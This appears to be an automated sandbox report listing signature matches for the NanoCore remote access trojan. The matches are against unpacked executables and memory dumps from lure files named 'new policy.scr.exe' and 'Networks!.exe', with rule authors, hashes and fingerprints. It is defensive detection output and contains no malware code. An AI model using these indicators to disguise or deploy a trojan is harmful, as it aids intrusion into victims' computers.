Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.new policy.scr.exe.42c7788.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.77d0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.77d0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.77d0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7950000.25.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7950000.25.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7950000.25.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.4405860.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.4405860.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.4405860.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.Networks!.exe.373ff94.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7980000.27.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7980000.27.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7980000.27.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7760000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7760000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7760000.16.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.43f7444.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.43f7444.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.43f7444.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.4550e57.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.4550e57.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.4550e57.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.795e8a4.26.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.795e8a4.26.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.795e8a4.26.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.4559c86.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.4559c86.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.4559c86.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.4405860.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.4405860.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.4405860.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7954c9f.24.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7954c9f.24.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7954c9f.24.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.Networks!.exe.60b5958.13.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.328f8ec.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.3255830.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.2239294193.0000000006173000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.1877031081.000000000428C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000006.00000002.2239294193.000000000607A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore author = JPCERT/CC Incident Response Group, description = detect Nanocore in memory, rule_usage = memory scan, reference = internal research
